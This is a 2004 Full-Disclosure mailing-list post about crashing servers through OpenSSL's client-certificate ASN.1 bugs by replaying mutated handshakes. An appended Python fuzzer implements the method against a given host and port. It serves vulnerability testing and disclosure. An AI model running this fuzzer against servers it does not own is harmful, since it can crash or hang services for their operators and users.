Date: Thu, 08 Jan 2004 23:50:18 +0100
From: "Bram Matthys (Syzop)" <syzop@...nscan.org>
To: "Lachniet, Mark" <mlachniet@...uoianet.com>
Cc: bugtraq@...urityfocus.com, pen-test@...urityfocus.com,
   full-disclosure@...ts.netsys.com
Subject: Re: Openssl proof of concept code?


Hi,

Lachniet, Mark wrote:
> A few months ago, there were issues with the openssl code base, as noted
> on bugtraq and in the following URLs:
> http://www.openssl.org/news/secadv_20031104.txt and
> http://www.openssl.org/news/secadv_20030930.txt.
[..]
> Is anyone aware of a reasonable way for an analyst to definitively
> demonstrate if the vulnerabilities exist in a particular product?  Since
> some of the bugs deal with bad client certificates, some might be as
> easy as getting a copy of a "bad" client certificate and connecting to
> the server using a program such as stunnel, but I have yet to see
> anything about this.

I'm an ircd coder and we have (optional) support for SSL connections,
so at that time I was interested in this issue and was surprised
nobody released proof of concept code either. A week or so after the
announcement I started looking at it myself.

I won't release my PoC since it's way too ugly, but what I did was
look at how a valid SSL handshake took place (with a client certificate)
[I just sniffed a stunnel session w/ client certificate].
Then I wrote a C program which does exactly that, EXCEPT that it modifies
some random bytes to random values.
Quite quickly I managed to crash the ircd server (after 5-15 attempts).
I was able to crash it at (at least) 2 different locations.

I also tested it against apache w/SSL but that mainly generated lots
of warning messages, like:
[error] error:0D0680A8:asn1 encoding routines:ASN1_CHECK_TLEN:wrong tag
[error] error:0D08403A:asn1 encoding routines:ASN1_TEMPLATE_EX_D2I:nested asn1 error
[error] error:1408900D:SSL routines:SSL3_GET_CLIENT_CERTIFICATE:ASN1 lib
[error] SSL_accept failed
etc...
Besides that, it didn't seem to have much effect (no signal 11s...).
After running the program for several hours, however, I somehow managed
to put some apache children into a loop, eating 100% CPU, and my
load avg. went up to 4 / 5.
Unfortunately I didn't have much time to investigate it.

Hope this helps,

	Bram Matthys (Syzop).

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
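The approach the mail describes (record the client side of a handshake that carries a client certificate, rewrite a few random bytes, replay it and watch the server) in working form, as an added example that is not the poster's program and not part of the original message. Every "captured" byte below is a constructed placeholder (a hand-built ClientHello, a Certificate message wrapping a five-byte DER blob, an empty RSA ClientKeyExchange), not a real stunnel trace or a real certificate; the mutator deliberately leaves the record and handshake headers intact so the corrupted bytes reach the ASN.1 parser instead of tripping a length check, which is where the ASN1_CHECK_TLEN errors quoted above come from.

```python
"""Mutation fuzzer for a recorded SSL/TLS client-side handshake (added example).

Replay is blind: the server's flight is read and discarded, and the recorded
ClientKeyExchange cannot match the server's key, so a live run only exercises
the server up to its parsing of the Certificate / ClientKeyExchange messages.
"""
import random
import socket
import struct

HANDSHAKE = 22    # TLS record content type
TLS10 = 0x0301    # record/handshake version


def tls_record(content_type, version, payload):
    """Wrap payload in a 5-byte TLS record header."""
    return struct.pack("!BHH", content_type, version, len(payload)) + payload


def handshake_msg(msg_type, body):
    """Wrap body in a 4-byte handshake header (type + 24-bit length)."""
    return struct.pack("!B", msg_type) + len(body).to_bytes(3, "big") + body


def certificate_body(certs):
    """Certificate message body: 24-bit list length, then 24-bit length + DER per cert."""
    entries = b"".join(len(c).to_bytes(3, "big") + c for c in certs)
    return len(entries).to_bytes(3, "big") + entries


# Constructed stand-ins for sniffed bytes: NOT a real capture, NOT a real certificate.
FAKE_DER_CERT = bytes.fromhex("3003020100")   # DER SEQUENCE { INTEGER 0 }, placeholder only
FAKE_CLIENT_HELLO = tls_record(HANDSHAKE, TLS10, handshake_msg(1,
    struct.pack("!H", TLS10) + bytes(32)      # client_version + zeroed 32-byte random
    + b"\x00"                                 # empty session id
    + b"\x00\x02\x00\x2f"                     # one cipher suite: TLS_RSA_WITH_AES_128_CBC_SHA
    + b"\x01\x00"))                           # null compression only
CAPTURED_CLIENT_FLIGHT = (
    tls_record(HANDSHAKE, TLS10, handshake_msg(11, certificate_body([FAKE_DER_CERT])))
    + tls_record(HANDSHAKE, TLS10, handshake_msg(16, b"\x00\x00"))  # empty RSA ClientKeyExchange
)


def parse_records(blob):
    """Split a byte blob into (content_type, version, payload) TLS records."""
    records, off = [], 0
    while off < len(blob):
        if len(blob) - off < 5:
            raise ValueError("truncated record header at offset %d" % off)
        ctype, version, length = struct.unpack("!BHH", blob[off:off + 5])
        payload = blob[off + 5:off + 5 + length]
        if len(payload) != length:
            raise ValueError("truncated record body at offset %d" % off)
        records.append((ctype, version, payload))
        off += 5 + length
    return records


def mutate_payload(payload, n_bytes, rng, skip=4):
    """Change n_bytes distinct positions of a handshake payload, each to a different value.

    The first `skip` bytes (handshake type + 24-bit length) are left alone so the
    server accepts the framing and hands the corrupted body to its real decoder.
    """
    buf = bytearray(payload)
    if len(buf) <= skip:
        return bytes(buf)
    for pos in rng.sample(range(skip, len(buf)), min(n_bytes, len(buf) - skip)):
        buf[pos] = (buf[pos] + rng.randrange(1, 256)) & 0xFF
    return bytes(buf)


def mutate_capture(blob, n_bytes, seed):
    """Return the recorded flight with every handshake record's body mutated; deterministic per seed."""
    rng = random.Random(seed)
    out = []
    for ctype, version, payload in parse_records(blob):
        if ctype == HANDSHAKE:
            payload = mutate_payload(payload, n_bytes, rng)
        out.append(tls_record(ctype, version, payload))   # same length, header stays valid
    return b"".join(out)


def replay_once(host, port, client_hello, client_flight, timeout=3.0):
    """One attempt; returns 'unreachable', 'timeout', 'closed' or 'responded'.

    'unreachable' after a run of normal results suggests the previous flight killed
    the listener; 'timeout' is what a child spinning at 100% CPU looks like from
    outside. Neither is proof on its own: confirm against the server's logs/cores.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(client_hello)
            s.recv(16384)                       # server flight, discarded
            s.sendall(client_flight)
            data = s.recv(16384)                # alert, further handshake, or EOF
            return "responded" if data else "closed"
    except socket.timeout:
        return "timeout"
    except ConnectionRefusedError:
        return "unreachable"
    except ConnectionError:
        return "closed"
    except OSError:
        return "unreachable"


if __name__ == "__main__":
    import sys
    host, port = sys.argv[1], int(sys.argv[2])
    for seed in range(int(sys.argv[3]) if len(sys.argv) > 3 else 20):
        flight = mutate_capture(CAPTURED_CLIENT_FLIGHT, 3, seed)
        # The seed is printed so a flight that produced a crash can be regenerated exactly.
        print("seed=%d %s" % (seed, replay_once(host, port, FAKE_CLIENT_HELLO, flight)))
```

Run as `python fuzz.py host 443 200` against a test instance you own. Printing the seed is what makes a hit reproducible, which is the part the mail's "too ugly" PoC lacked; in a real run you would replace the constructed constants with the client records from your own stunnel capture.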